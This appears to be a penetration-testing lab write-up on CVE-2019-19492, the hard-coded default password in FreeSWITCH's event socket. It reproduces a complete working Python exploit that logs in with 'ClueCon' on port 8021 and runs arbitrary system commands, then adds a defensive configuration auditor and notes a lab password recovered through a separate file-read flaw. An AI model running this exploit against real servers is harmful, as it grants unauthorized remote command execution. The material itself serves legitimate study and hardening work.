CVE-2019-19492


A vulnerability has been found in FreeSWITCH up to 1.10.1 and classified as critical. The affected component is an unspecified function involving the file event_socket.conf.xml; the weakness is hard-coded credentials. This vulnerability is known as CVE-2019-19492. The attack can be launched remotely.

Exploit


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ searchsploit -x windows/remote/47799.txt
  Exploit: FreeSWITCH 1.10.1 - Command Execution
      URL: https://www.exploit-db.com/exploits/47799
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
 
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
 
#!/usr/bin/python3
 
from socket import *
import sys
 
if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)
 
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
 
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
 
response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

The exploit is available locally. It authenticates with the auth command and then follows up with the api system command to execute an OS command. Notice that it relies on the default password, ClueCon, which turned out not to work here.
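The conditions the exploit above depends on (the shipped default ESL password, and a listener reachable from remote hosts without an inbound ACL) are all visible in event_socket.conf.xml, so they can be caught by a config audit before anything listens on 8021. The following checker is an added example written for this page, not code from the exploit author or from the FreeSWITCH project. The two embedded configs are constructed samples that mirror the layout of the stock file; the parameter names listen-ip, listen-port, password and apply-inbound-acl are the ones the stock file uses, and loopback.auto is the ACL name that appears in the stock file's commented-out example. The 16-character minimum is an arbitrary threshold chosen for the example.

```python
#!/usr/bin/env python3
"""Audit a FreeSWITCH event_socket.conf.xml for the weaknesses behind
CVE-2019-19492: the well-known default ESL password and an event socket
listener that remote hosts can reach without an inbound ACL."""
import ipaddress
import sys
import xml.etree.ElementTree as ET

DEFAULT_ESL_PASSWORD = "ClueCon"   # default password named in the exploit on this page
MIN_PASSWORD_LENGTH = 16           # arbitrary threshold chosen for this example

# Constructed sample (not a real deployment): stock layout with the weak defaults.
SAMPLE_WEAK_CONFIG = """\
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
  </settings>
</configuration>
"""

# Constructed sample: the same file after hardening.
SAMPLE_HARDENED_CONFIG = """\
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="REPLACE-WITH-A-LONG-RANDOM-SECRET"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>
"""


def load_params(xml_text):
    """Return the <param name=... value=.../> entries as a dict."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value") for p in root.iter("param")}


def audit_event_socket(xml_text):
    """Return a list of finding codes; an empty list means nothing was flagged."""
    params = load_params(xml_text)
    findings = []

    password = params.get("password", "")
    if password == DEFAULT_ESL_PASSWORD:
        findings.append("default-password")
    elif len(password) < MIN_PASSWORD_LENGTH:
        findings.append("short-password")

    # Anything other than a loopback address lets remote hosts reach the socket.
    listen_ip = params.get("listen-ip", "")
    try:
        remote_reachable = not ipaddress.ip_address(listen_ip).is_loopback
    except ValueError:
        remote_reachable = True  # missing or unparseable value: assume exposed

    if remote_reachable:
        findings.append("listens-on-non-loopback")
        if not params.get("apply-inbound-acl"):
            findings.append("no-inbound-acl")

    return findings


if __name__ == "__main__":
    # Usage: audit_event_socket.py /path/to/event_socket.conf.xml
    # With no argument the two constructed samples are audited instead.
    if len(sys.argv) == 2:
        with open(sys.argv[1], encoding="utf8") as fh:
            print(audit_event_socket(fh.read()))
    else:
        print("weak sample:    ", audit_event_socket(SAMPLE_WEAK_CONFIG))
        print("hardened sample:", audit_event_socket(SAMPLE_HARDENED_CONFIG))
```

Run against a real file the checker reports which of the three conditions hold; the weak sample trips all of them while the hardened sample trips none. Binding the socket to loopback removes the remote path the exploit needs, the ACL is defence in depth if the socket must be reachable, and changing the password is what actually closes the CVE.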

Modification


Leveraging the remote file read vulnerability in the target's Cassandra-Web instance, I was able to locate the real password: StrongClueConEight021